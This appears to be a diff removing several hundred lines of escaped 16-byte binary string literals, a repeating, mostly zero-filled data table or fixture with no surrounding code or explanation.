-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x40\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x40\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x40\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x40\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x40\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x40\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x48\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" 
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x48\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x44\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x48\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x48\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x50\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" 
-"\x00\x50\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x50\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x70\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x50\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x50\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x18\x00\x00\x00\x00\x80\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x88\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x8b\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" 
-"\x00\x00\x00\x00\x00\x80\x00\x00\xbe\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" 
-"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x95\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x2a\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\xd7\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" 
-"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" 
-"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" -"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00" -"\x00\x80\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x1f\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" -"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00" -"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x30\x00\x00" 
